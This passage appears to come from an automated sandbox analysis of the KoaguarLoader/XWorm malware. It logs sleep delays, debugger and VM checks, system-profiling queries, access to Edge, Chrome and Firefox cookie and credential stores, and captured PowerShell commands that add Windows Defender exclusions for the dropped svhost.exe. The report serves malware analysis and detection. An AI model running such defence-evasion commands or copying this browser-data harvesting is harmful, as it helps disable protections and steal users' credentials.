                        Source: KoaguarLoader.exe, 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: SBIEDLL.DLLCKDF3UFINPEMGYXUGBCIQXK5ZLFBIOVAFECIC6SWGI4MFDMTZ4Y7E5GTWVXQ5Q4TF2POC5W3DSXVMUBHIIA4HC387GD3QRXSLFCRHUC074VFAODHHYY2ZZXOSXDPHFEGCPJLQX65C2DRE2ZS0XJQ9ZZDLNGWFPSEGENMNDGHGNCNT0Y5HITFXHE9WPITW6HV9A4RJTDVLX2GCEPTYSWJJMTM1BUHCMCPXJ0X32H7CFOCJMCPHCXGCRMXSH6AYGRDD6WTDMD6AWH3XODZCWTUIF2RAQEBC4HJHUFQKJUBH2ZUOA2EVWCFRTGTG49AWW8ZOEPSZPZAYGHYJZLI75SOCUEXFGBU1PHXJL8ZVM4WOIVOJENYMRQI0KCTITMTHGN3FU6TQZTH6WWQFPLAGEXHS4TKCIFNBYZCQXGEXNRG1B3FJXXDWVWWPYI6MOCV9PCC3AASA0LEUIQWYOMEGKOKUNBCYQBMINFO
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Memory allocated: 1450000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Memory allocated: 1B110000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Memory allocated: 7A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Memory allocated: 1A4B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599875
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599765
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599656
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599547
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599437
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599328
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599218
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 599109
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598999
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598890
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598781
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598671
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598562
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598452
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598343
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598233
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 598118
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597999
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597889
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597780
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597671
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597561
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597451
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597341
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597232
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597123
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 597013
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 596904
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 596794
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 596685
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 596576
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Thread delayed: delay time: 596466
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Window / User API: threadDelayed 3405
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Window / User API: threadDelayed 6437
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5933
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3820
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7364
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2193
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7974
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1610
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7541
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1994
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -29514790517935264s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599875s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599765s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599656s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599547s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599437s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599328s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599218s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -599109s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598999s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598890s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598781s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598671s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598562s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598452s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598343s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598233s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -598118s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597999s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597889s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597780s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597671s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597561s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597451s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597341s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597232s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597123s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -597013s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -596904s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -596794s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -596685s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -596576s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408 Thread sleep time: -596466s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808 Thread sleep count: 7974 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808 Thread sleep count: 1610 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7932 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940 Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\svhost.exe TID: 8116 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select TotalPhysicalMemory from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select TotalPhysicalMemory from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\svhost.exe File Volume queried: C:\ FullSizeInformation
                        Source: svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: vmware
                        Source: svchost.exe, 0000000F.00000002.2133138102.000001CB6802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2135882776.000001CB6D859000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                        Source: svhost.exe, 00000003.00000002.2146294254.000000001BF11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWver"%SystemRoot%\system32\mswsock.dllnablePasswordReset="true"
                        Source: KoaguarLoader.exe, 00000002.00000002.943836986.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.948816607.000000000123E000.00000004.00000020.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1086595215.000000000141E000.00000004.00000020.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2134721083.000000000140E000.00000004.00000020.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217131323.000000000142B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe Process information queried: ProcessInformation

                        Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Code function: 3_2_00007FF936A97871 CheckRemoteDebuggerPresent, 3_2_00007FF936A97871
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'
Source: C:\Users\user\Desktop\KoaguarLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe"
Source: C:\Users\user\Desktop\KoaguarLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\svhost.exe "C:\Users\user\AppData\Local\Temp\svhost.exe"
Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Process created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004478000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004A42000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004271000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program Manager'
Source: KoaguarLoader.exe, 00000002.00000002.951588515.000000000287E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: {"adm":"true","bld":"GYUdvZaEZRGFsyjjc4Z4","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"4UM_3KAGS","mem":4,"pcn":"813435","uname":"user-PC\\user","version":"0.22.0","win":"Program Manager","winv":"Microsoft Windows 10 Pro"}
Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000276C000.00000004.00001000.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ~Program Manager
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004A42000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BfProgram Manager
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0iknzArd8%2BXL5rTCiJhOqJPjYGpixphX1XGPd1rentd5IXA05Dam8QRosb{"1":"5","2":"f6ef22dd17e317c8a968f74f07647597","3":"Program Manager","4":"1"}
Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002744000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: *struct { Caption string }Microsoft Windows 10 ProConnectServerProgram Manager2.5.29.14Actalis S.p.A./03358520967Actalis Authentication Root CAActalis S.p.A./03358520967Actalis Authentication Root CA2.5.29.142.5.29.192.5.29.352.5.29.15
Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004478000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BpProgram Manager
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "Program Manager"
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BlProgram Managerl
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004A42000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BoProgram Manager
Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: [Tue, 11 Mar 2025 16:12:03 GMTProgram ManagerTue, 11 Mar 2025 16:12:04 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:19 GMTProgram Manager
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BjProgram Manager
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0iknzArd8%2BXL5rTCiJhOqJPjYGpixphX1XGPd1rentd5IXA05Dam8QRosb{"1":"5","2":"f6ef22dd17e317c8a968f74f07647597","3":"Program Manager","4":"1"}
Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000276C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: GetWindowTextWProgram Managertruetrue"813435"'
Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BiProgram Manager

                        Language, Device and Operating System Detection

Source: Yara match | File source: KoaguarLoader.exe, type: SAMPLE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Queries volume information: C:\Program Files (x86) VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\svhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AmountExtractionHeuristicRegexes VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
